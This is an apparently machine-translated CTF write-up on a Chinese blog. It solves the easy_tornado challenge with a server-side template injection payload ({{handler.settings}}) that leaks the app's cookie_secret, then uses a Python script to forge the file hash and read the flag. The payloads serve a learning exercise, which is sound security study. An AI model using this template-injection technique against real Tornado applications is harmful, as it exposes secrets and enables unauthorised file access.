当前位置:网站首页>Vulnerability recurrence easy_ tornado
Vulnerability recurrence easy_ tornado
2022-07-07 08:10:00 【_ s1mple】
[ Environmental Science ]
windows
[ Tools ]
Firefox
[ step ]
tornado yes python One of them web Application framework .
Got the title and found three documents :
flag.txt
/flag.txt
flag in /fllllllllllllagFind out flag stay /fllllllllllllag In the document ;
welcome.txt
/welcome.txt
renderrender yes python A rendering function in , Render variables into the template , That is, different pages can be formed by passing different parameters .
hints.txt
/hints.txt
md5(cookie_secret+md5(filename))filehash=md5(cookie_secret+md5(filename)) Now? filename=/fllllllllllllag, Just need to know cookie_secret Can access flag.
After the test, I found another one error Interface , The format is /error?msg=Error, It is suspected that there is a server-side template injection attack (SSTI)
Try /error?msg={ {datetime}} stay Tornado In the front-end page template ,datetime It's pointing python in datetime This module ,Tornado Some object aliases are provided to quickly access objects , You can refer to Tornado Official documents
Find... By looking up the documentation cookie_secret stay Application object settings Properties of the , Also found that self.application.settings There's an alias
RequestHandler.settings
An alias for self.application.settings.handler To handle the current page RequestHandler object , RequestHandler.settings Point to self.application.settings, therefore handler.settings Point to RequestHandler.application.settings.
structure payload obtain cookie_secret
/error?msg={
{handler.settings}}
'cookie_secret': 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'Calculation filehash value :
import hashlib
def md5(s):
md5 = hashlib.md5()
md5.update(s)
return md5.hexdigest()
def filehash():
filename = '/fllllllllllllag'
cookie_secret = 'M)Z.>}{O]lYIp(oW7$dc132uDaK<C%[email protected]![VtR#geh9UHsbnL_+mT5N~J84*r'
print(md5(cookie_secret+md5(filename)))
if __name__ == '__main__':
filehash()payload:
file?filename=/fllllllllllllag&filehash=md5(cookie_secret+md5(/fllllllllllllag))Succeed in getting flag.
边栏推荐
- Qinglong panel - today's headlines
- Thinkcmf6.0 installation tutorial
- Minimum absolute difference of binary search tree (use medium order traversal as an ordered array)
- Pytorch(六) —— 模型调优tricks
- 【数字IC验证快速入门】11、Verilog TestBench(VTB)入门
- The charm of SQL optimization! From 30248s to 0.001s
- [quickstart to Digital IC Validation] 15. Basic syntax for SystemVerilog Learning 2 (operator, type conversion, loop, Task / Function... Including practical exercises)
- Es FAQ summary
- Rust versus go (which is my preferred language?)
- [quick start of Digital IC Verification] 17. Basic grammar of SystemVerilog learning 4 (randomization)
猜你喜欢
Open source ecosystem | create a vibrant open source community and jointly build a new open source ecosystem!
Padavan manually installs PHP
UnityHub破解&Unity破解
船载雷达天线滑环的使用
The largest 3 same digits in the string of leetcode simple question
JSON data flattening pd json_ normalize
数据库实时同步利器——CDC(变化数据捕获技术)
【数字IC验证快速入门】14、SystemVerilog学习之基本语法1(数组、队列、结构体、枚举、字符串...内含实践练习)
Main window in QT learning 27 application
快解析内网穿透助力外贸管理行业应对多种挑战
随机推荐
Complete linear regression manually based on pytoch framework
Introduction to basic components of wechat applet
让Livelink初始Pose与动捕演员一致
DNS server configuration
JS复制图片到剪切板 读取剪切板
Bayes' law
电池、电机技术受到很大关注,反而电控技术却很少被提及?
C语言二叉树与建堆
2022 National latest fire-fighting facility operator (primary fire-fighting facility operator) simulation questions and answers
Open source ecosystem | create a vibrant open source community and jointly build a new open source ecosystem!
Notes on PHP penetration test topics
Hisense TV starts the developer mode
Blob 对象介绍
Qinglong panel - today's headlines
芯片资料 网站 易特创芯
offer收割机:两个长字符串数字相加求和(经典面试算法题)
漏洞复现-Fastjson 反序列化
The element with setfieldsvalue set is obtained as undefined with GetFieldValue
Empire CMS collection Empire template program general
It took "7" years to build the robot framework into a micro service